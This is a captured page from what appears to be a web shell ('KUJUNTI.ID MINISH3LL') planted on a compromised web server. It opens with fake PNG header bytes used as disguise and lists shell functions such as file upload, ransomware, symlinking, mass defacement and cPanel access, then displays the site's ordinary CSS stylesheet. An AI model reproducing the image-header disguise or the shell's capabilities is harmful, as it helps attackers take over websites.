\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 www.csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/veridatapostgres/veridatasite/tmp/static/css/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/veridatapostgres/veridatasite/tmp/static/css/style.css


:root {
    --primary-color: #0066cc;
    --secondary-color: #00a0dc;
    --dark-color: #1a1a1a;
    --teal-color: #00A3B4;
}

body {
    font-family: 'Segoe UI', system-ui, -apple-system, sans-serif;
    padding-top: 76px;
}

/* Header */
.navbar {
    box-shadow: 0 2px 4px rgba(0,0,0,0.1);
}

.navbar-brand img.logo {
    height: 40px;
    width: auto;
    transition: transform 0.3s ease;
}

.navbar-brand:hover img.logo {
    transform: scale(1.05);
}

/* Footer */
footer img.logo {
    height: 40px;
    width: auto;
    filter: brightness(1.2);
}

/* Hero Section */
.hero {
    background: linear-gradient(135deg, var(--primary-color), var(--secondary-color));
    color: white;
    padding: 100px 0;
    overflow: hidden;
    position: relative;
}

.hero h1 {
    font-size: 3.5rem;
    font-weight: 700;
    margin-bottom: 1.5rem;
}

.hero .lead {
    font-size: 1.4rem;
    margin-bottom: 2rem;
}

.hero .btn-light {
    padding: 1rem 2rem;
    font-size: 1.2rem;
    font-weight: 600;
    text-transform: uppercase;
    letter-spacing: 0.5px;
    box-shadow: 0 4px 15px rgba(255,255,255,0.2);
    transition: all 0.3s ease;
}

.hero .btn-light:hover {
    transform: translateY(-3px);
    box-shadow: 0 6px 20px rgba(255,255,255,0.3);
}

.hero::after {
    content: '';
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: radial-gradient(circle at center, rgba(255,255,255,0.1) 0%, transparent 70%);
    pointer-events: none;
}

/* Services */
.service-card {
    border: none;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
    height: 100%;
    padding: 2rem;
    background: #fff;
    border-radius: 12px;
    box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}

.service-card:hover {
    transform: translateY(-5px);
    box-shadow: 0 8px 15px rgba(0,0,0,0.1);
}

.service-icon {
    font-size: 2.5rem;
    color: var(--primary-color);
    margin-bottom: 1.5rem;
    transition: transform 0.3s ease;
}

.service-card:hover .service-icon {
    transform: scale(1.1);
}

.service-card h5 {
    font-size: 1.4rem;
    margin-bottom: 1rem;
    color: var(--dark-color);
}

.service-card p {
    color: #666;
    font-size: 1rem;
    line-height: 1.6;
}

/* Partners */
/* Partners Section */
.partners-section {
    background-color: #fff;
    padding: 60px 0;
    overflow: hidden;
}

.partner-logo {
    max-height: 80px;
    width: auto;
    opacity: 0.9;
    transition: all 0.3s ease;
}

.partner-logo:hover {
    opacity: 1;
    transform: translateY(-5px);
}

/* Partners Sliding Carousel */
.partners-slider {
    width: 100%;
    overflow: hidden;
    position: relative;
}

.partners-slider::before,
.partners-slider::after {
    content: '';
    position: absolute;
    top: 0;
    width: 100px;
    height: 100%;
    z-index: 2;
    pointer-events: none;
}

.partners-slider::before {
    left: 0;
    background: linear-gradient(to right, #fff 0%, transparent 100%);
}

.partners-slider::after {
    right: 0;
    background: linear-gradient(to left, #fff 0%, transparent 100%);
}

.partners-track {
    display: flex;
    align-items: center;
    gap: 60px;
    animation: slidePartners 30s linear infinite;
    width: max-content;
}

.partners-track:hover {
    animation-play-state: paused;
}

@keyframes slidePartners {
    0% {
        transform: translateX(0);
    }
    100% {
        transform: translateX(-50%);
    }
}

.partner-slide {
    flex-shrink: 0;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 10px 20px;
}

.partner-logo-slide {
    max-height: 60px;
    max-width: 140px;
    width: auto;
    height: auto;
    object-fit: contain;
    filter: grayscale(100%);
    opacity: 0.7;
    transition: all 0.3s ease;
}

.partner-slide:hover .partner-logo-slide {
    filter: grayscale(0%);
    opacity: 1;
    transform: scale(1.1);
}

@media (max-width: 768px) {
    .partner-logo {
        max-height: 60px;
        margin: 10px 0;
    }
    
    .partners-track {
        gap: 40px;
    }
    
    .partner-logo-slide {
        max-height: 45px;
        max-width: 100px;
    }
    
    .partners-slider::before,
    .partners-slider::after {
        width: 50px;
    }
}

/* Contact Form */
.contact-form {
    background: #f8f9fa;
    padding: 30px;
    border-radius: 10px;
}

/* ISO Section */
.iso-section {
    text-align: center;
    margin: 20px 0;
    background-color: #f8f9fa;
    padding: 60px 0;
}

.iso-section h2 {
    color: var(--dark-color);
    font-weight: 600;
    margin-bottom: 20px;
}

.iso-section p {
    color: #666;
    max-width: 800px;
    margin: 0 auto 40px auto;
}

/* Certifications Section */
.cert-section {
    text-align: center;
    margin: 40px 0;
    padding: 60px 0;
    background-color: #f8f9fa;
}

.cert-section h2 {
    color: var(--dark-color);
    font-weight: 600;
    margin-bottom: 40px;
}

.cert-logo, .iso-cert {
    background: #fff;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 2px 15px rgba(0,0,0,0.1);
    height: 100%;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
}

.cert-logo:hover, .iso-cert:hover {
    transform: translateY(-5px);
    box-shadow: 0 5px 20px rgba(0,0,0,0.15);
}

.cert-logo img, .iso-cert img {
    max-width: 100%;
    height: 100px;
    width: 100px;
    object-fit: contain;
    margin-bottom: 15px;
    transition: transform 0.3s ease;
}

/* ISO sertifikaları için sabit boyut */
.iso-certs .iso-cert img {
    width: 120px !important;
    height: 120px !important;
    object-fit: contain;
}

.cert-logo:hover img, .iso-cert:hover img {
    transform: scale(1.05);
}

.cert-logo p, .iso-cert p {
    font-weight: 500;
    color: var(--dark-color);
    margin: 0;
}

/* ISO Certificates Grid */
.iso-certs {
    display: flex;
    justify-content: center;
    gap: 40px;
    margin-top: 40px;
    flex-wrap: wrap;
}

/* Responsive adjustments */
@media (max-width: 768px) {
    .cert-logo, .iso-cert {
        padding: 15px;
    }

    .cert-logo img, .iso-cert img {
        height: 70px;
        width: 70px;
    }

    .iso-certs .iso-cert img {
        width: 80px !important;
        height: 80px !important;
    }

    .iso-certs {
        gap: 20px;
    }
}

/* Footer ISO Certificates */
.footer-iso-certs {
    gap: 20px;
    margin-top: 15px;
}

.footer-iso-certs .iso-cert img {
    width: 50px;
    height: auto;
    filter: brightness(1.2);
}

/* Animations */
.fade-in {
    opacity: 0;
    transform: translateY(20px);
    transition: opacity 0.6s ease, transform 0.6s ease;
}

.fade-in.visible {
    opacity: 1;
    transform: translateY(0);
}

/* Responsive */
@media (max-width: 768px) {
    .hero {
        padding: 60px 0;
    }

    .partner-logo {
        max-height: 40px;
    }

    .iso-certs {
        flex-direction: column;
        gap: 30px;
    }
}

/* Modern Illustration */
.modern-illustration {
    max-width: 100%;
    height: auto;
    transform: scale(1.1);
    transition: all 0.5s ease;
    filter: drop-shadow(0 10px 20px rgba(0,0,0,0.15));
}

.modern-illustration:hover {
    transform: scale(1.15) translateY(-10px);
    filter: drop-shadow(0 20px 30px rgba(0,0,0,0.2));
}


/* Solutions Section Styling */
.solutions {
    background-color: #f8f9fa;
    padding: 60px 0;
}

.solution-card {
    background: #fff;
    padding: 30px;
    border-radius: 10px;
    box-shadow: 0 2px 15px rgba(0,0,0,0.1);
    height: 100%;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
}

.solution-card:hover {
    transform: translateY(-5px);
    box-shadow: 0 5px 20px rgba(0,0,0,0.15);
}

.solution-icon {
    width: 60px;
    height: 60px;
    background: rgba(0,102,204,0.1);
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    margin-bottom: 20px;
}

.solution-icon i {
    font-size: 24px;
    color: var(--primary-color);
}

.solution-card h3 {
    font-size: 1.5rem;
    color: var(--dark-color);
    margin-bottom: 15px;
}

.solution-card p {
    color: #666;
    font-size: 1rem;
    line-height: 1.6;
    margin: 0;
}

/* Expertise Section */
.expertise {
    background-color: #f8f9fa;
    padding: 60px 0;
}

.expertise-logo {
    background: #fff;
    padding: 15px;
    border-radius: 10px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
    height: 90px;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    gap: 6px;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
}

.expertise-logo:hover {
    transform: translateY(-3px);
    box-shadow: 0 5px 15px rgba(0,0,0,0.15);
}

.expertise-logo i {
    color: var(--primary-color);
    opacity: 0.7;
    font-size: 1.8rem;
    transition: opacity 0.3s ease, transform 0.3s ease;
}

.expertise-logo:hover i {
    opacity: 1;
    transform: scale(1.05);
}

.logo-text {
    font-size: 0.75rem;
    font-weight: 500;
    color: var(--dark-color);
    text-align: center;
    margin-top: 2px;
}

/* AI Tech Cards - Same style as others */
.expertise-logo.ai-tech {
    background: #fff;
}

.expertise-logo.ai-tech i {
    color: var(--primary-color);
    opacity: 0.7;
}

.expertise-logo.ai-tech:hover i {
    opacity: 1;
}

/* Tech Category Cards */
.tech-category-card {
    background: #fff;
    border-radius: 16px;
    padding: 30px 20px;
    text-align: center;
    box-shadow: 0 2px 15px rgba(0,0,0,0.08);
    cursor: pointer;
    transition: all 0.3s ease;
    height: 100%;
}

.tech-category-card:hover {
    transform: translateY(-5px);
    box-shadow: 0 8px 30px rgba(0,0,0,0.12);
}

.tech-category-icon {
    width: 60px;
    height: 60px;
    margin: 0 auto 15px;
    display: flex;
    align-items: center;
    justify-content: center;
}

.tech-category-icon i {
    font-size: 2.5rem;
    color: var(--primary-color);
}

.tech-category-card h5 {
    font-size: 1rem;
    font-weight: 600;
    color: #0f172a;
    margin-bottom: 8px;
}

.tech-category-card p {
    font-size: 0.85rem;
    color: #64748b;
    margin: 0;
    line-height: 1.4;
}

/* Tech Modal Styles */
.tech-modal {
    border: none;
    border-radius: 20px;
    overflow: hidden;
}

.tech-modal .modal-header {
    background: linear-gradient(135deg, #0f172a, #1e293b);
    color: #fff;
    border: none;
    padding: 20px 25px;
}

.tech-modal .modal-title {
    font-weight: 600;
}

.tech-modal .modal-title i {
    color: var(--primary-color);
}

.tech-modal .btn-close {
    filter: invert(1);
    opacity: 0.8;
}

.tech-modal .modal-body {
    padding: 30px;
    background: #f8fafc;
}

.tech-grid {
    display: grid;
    grid-template-columns: repeat(4, 1fr);
    gap: 15px;
}

.tech-item {
    background: #fff;
    border-radius: 12px;
    padding: 20px 15px;
    text-align: center;
    box-shadow: 0 2px 8px rgba(0,0,0,0.06);
    border: 1px solid #e2e8f0;
    transition: all 0.3s ease;
}

.tech-item:hover {
    transform: translateY(-3px);
    box-shadow: 0 6px 20px rgba(0,0,0,0.1);
    border-color: var(--primary-color);
}

.tech-item i {
    font-size: 1.8rem;
    color: var(--primary-color);
    display: block;
    margin-bottom: 10px;
}

.tech-item span {
    font-size: 0.85rem;
    font-weight: 500;
    color: #334155;
}

@media (max-width: 768px) {
    .tech-category-card {
        padding: 20px 15px;
    }
    
    .tech-category-icon i {
        font-size: 2rem;
    }
    
    .tech-category-card h5 {
        font-size: 0.9rem;
    }
    
    .tech-category-card p {
        font-size: 0.75rem;
    }
    
    .tech-grid {
        grid-template-columns: repeat(2, 1fr);
        gap: 10px;
    }
    
    .tech-item {
        padding: 15px 10px;
    }
    
    .tech-item i {
        font-size: 1.4rem;
    }
    
    .tech-item span {
        font-size: 0.75rem;
    }
}

/* Responsive adjustments */
@media (max-width: 768px) {
    .expertise-logo {
        height: 80px;
        padding: 12px;
    }

    .expertise-logo i {
        font-size: 1.5rem;
    }

    .logo-text {
        font-size: 0.7rem;
    }
}

/* 404 Error Page Styles */
.error-page {
    min-height: calc(100vh - 300px);
    display: flex;
    align-items: center;
    padding: 60px 0;
}

.error-content {
    background: #fff;
    padding: 40px;
    border-radius: 15px;
    box-shadow: 0 10px 30px rgba(0,0,0,0.1);
}

.error-content .display-1 {
    font-size: 8rem;
    font-weight: 700;
    background: linear-gradient(135deg, var(--primary-color), var(--secondary-color));
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    line-height: 1;
    margin-bottom: 30px;
}

.error-content h2 {
    color: var(--dark-color);
    font-weight: 600;
    margin-bottom: 20px;
}

.error-content .lead {
    color: #666;
    margin-bottom: 30px;
}

.error-content .btn {
    padding: 12px 30px;
    font-weight: 500;
    transition: all 0.3s ease;
}

.error-content .btn:hover {
    transform: translateY(-2px);
    box-shadow: 0 5px 15px rgba(0,0,0,0.1);
}

@media (max-width: 768px) {
    .error-content .display-1 {
        font-size: 6rem;
    }
}

/* Cookie Consent Styles */
.cookie-consent {
    position: fixed;
    bottom: -100%;
    left: 0;
    right: 0;
    background: rgba(33, 37, 41, 0.95);
    color: white;
    padding: 1rem;
    z-index: 9999;
    transition: bottom 0.3s ease-in-out;
}

.cookie-consent.show {
    bottom: 0;
}

.cookie-consent .container {
    display: flex;
    align-items: center;
    justify-content: space-between;
    gap: 1rem;
}

.cookie-consent p {
    margin: 0;
    font-size: 0.95rem;
}

.cookie-consent .btn {
    white-space: nowrap;
    padding: 0.5rem 1.5rem;
    transition: all 0.3s ease;
}

.cookie-consent .btn:hover {
    transform: translateY(-2px);
}

@media (max-width: 768px) {
    .cookie-consent .container {
        flex-direction: column;
        text-align: center;
    }

    .cookie-consent .btn {
        width: 100%;
        margin-top: 1rem;
    }
}

/* AI Solutions Cards */
.ai-solutions {
    background: #fff;
}

.solution-card-link {
    text-decoration: none;
    color: inherit;
    display: block;
}

.solution-card-link:hover {
    text-decoration: none;
    color: inherit;
}

.ai-card {
    background: linear-gradient(135deg, #f8fafc 0%, #e2e8f0 100%);
    border: 2px solid transparent;
    transition: all 0.3s ease;
}

.ai-card:hover {
    border-color: var(--primary-color);
    transform: translateY(-8px);
    box-shadow: 0 12px 30px rgba(0, 102, 204, 0.15);
}

.ai-icon {
    background: linear-gradient(135deg, var(--primary-color), var(--secondary-color));
    color: white !important;
    width: 70px;
    height: 70px;
}

.ai-icon i {
    color: white !important;
}

.ai-icon svg {
    color: white;
    width: 36px;
    height: 36px;
}

.ai-card h3 {
    color: var(--primary-color);
    font-weight: 700;
}

.ai-card p {
    color: #4a5568;
}

/* ============================================
   Clickable Service Cards
============================================ */
.clickable-card {
    cursor: pointer;
    transition: all 0.3s ease;
    border: 2px solid transparent;
}

.clickable-card:hover {
    transform: translateY(-8px);
    border-color: var(--primary-color);
    box-shadow: 0 12px 30px rgba(0, 102, 204, 0.2);
}

.clickable-card:hover .service-icon {
    transform: scale(1.1);
    color: var(--primary-color);
}

.clickable-card .card-title {
    color: #333;
    transition: color 0.3s ease;
}

.clickable-card:hover .card-title {
    color: var(--primary-color);
}

.clickable-card .card-text {
    color: #666;
}

/* ============================================
   Google Translate - Hidden but Functional
============================================ */
#google_translate_element {
    position: absolute;
    left: -9999px;
    visibility: hidden;
}

/* Hide Google Translate top bar and popups */
.goog-te-banner-frame,
.skiptranslate:not(#google_translate_element),
#goog-gt-tt,
.goog-te-balloon-frame,
.goog-te-menu-frame {
    display: none !important;
}

body {
    top: 0 !important;
    position: static !important;
}

html.translated-ltr, html.translated-rtl {
    margin-top: 0 !important;
}

/* Language dropdown styling */
.lang-switch {
    display: flex;
    align-items: center;
    gap: 8px;
}

.lang-switch:hover {
    background-color: #f0f7ff;
    color: var(--primary-color);
}

© KUJUNTI.ID